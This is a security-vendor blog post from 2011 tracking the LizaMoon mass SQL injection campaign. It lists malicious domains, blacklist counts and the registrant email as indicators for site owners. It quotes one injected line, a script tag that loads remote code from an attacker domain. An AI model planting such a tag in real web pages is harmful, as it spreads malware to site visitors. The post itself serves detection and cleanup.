• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

LizaMoon SQL injections (ur.php) – Now vcvsta.com, asweds.com, etc.

May 25, 2011David Dede

0
SHARES
FacebookTwitterSubscribe

A couple of months ago the Lizamoon malware / Mass SQL injection was getting a lot of news coverage that it could be affecting hundreds of thousands of sites.

The media mostly forgot about it, but we kept tracking those attacks and they are continuing at full force, but using different domain names.

For example, the domain http://vcvsta.com/ur.php caused 1.5k sites to get blacklisted by Google:

Yes, this site has hosted malicious software over the past 90 days. It infected 1583 domain(s), including chamc.co.kr/, mugunghwa.or.kr/, humour.com/.

While http://statsl.com/ur.php, caused more than 600 sites to get blacklisted and searching on Google for http://asweds.com/ur.php on ASP sites returns more than 2k pages.

Yes, this site has hosted malicious software over the past 90 days. It infected 622 domain(s), including rozanaspokesman.com/, 89fm.com.br/, phhc.co.kr/.

So what is going on? The attacks are still at full force, but using different domains names to distribute the malware (always registered by jamesnorthone@hotmailbox.com). A hacked site will have the following code added to their pages (or very similar):

<script src=http://asweds.com/ur.php>..

These are some of the new domains used in this attack:

http://vcvsta.com/ur.php
http://asweds.com/ur.php
http://statsl.com/ur.php
http://general-st.info/ur.php
http://online-guest.info/ur.php
http://google-stats44.info/ur.php
http://booksolo.com (showing up on hacked sites – seo spam)
http://bookvila.com (showing up on hacked sites – seo spam)
http://booktuba.com (showing up on hacked sites – seo spam)
http://bookavio.com (showing up on these hacked sites – seo spam)
http://booknunu.com (same as above)

And some of the old domains being used on for these mass SQL injections:

http://tadygus.com/ur.php
http://lizamoon.com/ur.php
http://alisa-carter.com/ur.php
http://google-stats50.info/ur.php
http://pop-stats.info/ur.php
http://sol-stats.info/ur.php
http://online-guest.info/ur.php
http://google-stats48.info/ur.php
http://google-stats49.info/ur.php
http://google-stats50.info/ur.php
http://milapop.com/ur.php
http://multi-stats.info/ur.php
http://general-st.info/ur.php
http://worid-of-books.com/ur.php
http://google-server12.info/ur.php
http://stats-master111.info/ur.php

We posted more details on these types of attacks when the first one hit almost a year ago: Mass infection of IIS/ASP sites – robint.us

A good way to check if your site is infected, is by using our malware scanner. If you see IIS:4 as the malware code, you know what happened.


If you have any questions or need help cleaning it up, let us know. If you need immediate clean up assistance, visit our Sign Up page.

0
SHARES
FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates, Server Security, SQL Injection

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Dan Cummings

    June 20, 2011

    Does anybody know why google keeps telling me that I still have this in my pictures when I know that I don’t?

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.